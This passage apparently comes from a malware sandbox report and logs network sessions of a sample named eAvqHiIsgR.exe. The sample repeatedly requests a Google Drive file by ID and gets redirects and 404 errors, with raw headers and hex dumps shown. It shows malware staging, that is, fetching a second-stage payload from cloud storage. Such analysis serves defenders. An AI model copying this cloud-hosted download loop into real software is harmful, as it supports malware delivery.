                                                                    Date: Tue, 03 Dec 2024 16:26:02 GMT
                                                                    Content-Security-Policy: script-src 'nonce-GUfdNp9Y8W4ROMNRSIx-ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC6yOryCjVV3EbeUPRCxsjmBilTy1OBwe3mp30y50a8AhDz2NIny20i1IKUnw5xBzbDOM3sGq5LmLg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6e 53 41 42 52 4c 78 4a 48 71 31 30 79 58 77 4e 67 65 68 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="knSABRLxJHq10yXwNgehdA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.549967172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:05 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:06 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:05 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-8SHQc6z9HPMnsxh_XW2Qtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.549968142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:07 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:08 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:08 GMT
                                                                    Content-Security-Policy: script-src 'nonce--MWVypKTJpvoZBJQG-DpWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5PnXHGCOH4U0tLIdcp2EiDEstZnrcLE95LsHQ4uhq0LTK1vFJqg7gPWO1Z38B4qI_NiL8vow_5rg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6c 52 77 47 42 32 36 55 69 69 55 68 75 52 4f 42 37 6e 5f 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wlRwGB26UiiUhuROB7n_vQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.549969172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:10 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:11 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:11 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-ypj5VyeLJHEBteW_i9Byhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.549970142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:13 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:14 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:13 GMT
                                                                    Content-Security-Policy: script-src 'nonce-qN0EOC1nkznqPMHC5H4CwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC6e3vQNlkqAnAUNL2HM9xixg4Q8hqxab00eFSxbfE0KmhrjA2tCiAHuc60PDK5w9p42DmKHsPTIdg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 41 61 6b 77 5f 39 54 71 67 43 57 66 49 57 2d 55 73 41 2d 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QAakw_9TqgCWfIW-UsA-Aw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.549971172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:16 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:17 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:16 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-wfGhW7iknOSQ4dcG6i4Bng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.549972142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:18 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:19 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:19 GMT
                                                                    Content-Security-Policy: script-src 'nonce-uQnJiq9ftKYWIFgJSKS7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC4KK_QXxtN71vNgIHyHNOnVpkJv2vMEDcGcsNKDoqjJKAyAlMXr4ryhn6sANgft83lIaHj9KmjXjA
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 6a 2d 6c 4d 6b 4c 70 44 57 4f 4a 61 59 59 5f 78 69 46 6d 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xj-lMkLpDWOJaYY_xiFmyw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.549973172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:21 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:22 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:22 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-e3-xdlm5mSNb0rJ9T-5rhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
